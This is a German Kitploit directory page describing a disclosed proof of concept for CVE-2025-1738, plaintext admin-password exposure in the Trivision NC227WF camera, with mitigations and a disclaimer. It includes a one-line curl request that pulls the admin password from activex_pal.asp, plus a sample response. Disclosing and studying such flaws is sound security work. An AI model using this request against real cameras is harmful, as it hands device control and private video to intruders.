Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-1738 — 0-Day-Entdeckung CVE-2025-1738 | Kitploit
Tools/GitHubGitHub/n0n4m3x41/cve-2025-1738
IoT-SicherheitPasswortangriffeSchwachstellenanalyseExploitationHardware- & IoT-SicherheitLernen & Bildung
GitHubn0n4m3x41/cve-2025-1738

CVE-2025-1738

0-Day-Entdeckung CVE-2025-1738

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-1738 - Trivision Kamera NC227WF PoC

📋 Übersicht

Nach verantwortungsvoller Offenlegung wurden zwei offizielle CVEs zugewiesen.

CVECVSS v3.1ScoreCWETyp
CVE-2025-1738AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N6.2CWE-598Klartext-Passwortoffenlegung

🔍 CVE-2025-1738 — Klartext-Passwortoffenlegung (CWE-598)

Beschreibung

Jeder lokale Benutzer kann das Admin-Passwort im Klartext abrufen, ohne dass eine vorherige Authentifizierung erforderlich ist.

  • Angriffsvektor: Lokal (AV:L)
  • CVSS-Score: 6.2
  • CWE: CWE-598 (Verwendung der GET-Anfragemethode mit sensiblen Query-Strings)

Payload

root@kitploit:~
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp

Beispielantwort

Bild
root@kitploit:~
...password=unguessable123!...

Das Admin-Passwort wird im Klartext im Antworttext zurückgegeben.


🛡️ Gegenmaßnahmen

  • Firmware aktualisieren, falls eine gepatchte Version von Trivision verfügbar ist.
  • Kamera isolieren in einem dedizierten VLAN ohne externen Zugriff.
  • Firewall: Den Verwaltungsport der Kamera von nicht vertrauenswürdigen Netzwerksegmenten abschirmen.
  • Standard-Anmeldedaten ändern und Passwörter regelmäßig rotieren.
  • Überwachen Sie unerwarteten Zugriff auf activex_pal.asp und mblogin.asp.

📚 Referenzen

  • NVD — CVE-2025-1738
  • NVD — CVE-2025-1739

⚖️ Haftungsausschluss

Dieses Repository dient nur Bildungs- und autorisierten Sicherheitsforschungszwecken. Die Autoren sind nicht für Missbrauch verantwortlich. Holen Sie vor dem Testen eines Geräts immer die ausdrückliche Genehmigung ein.

Tool herunterladen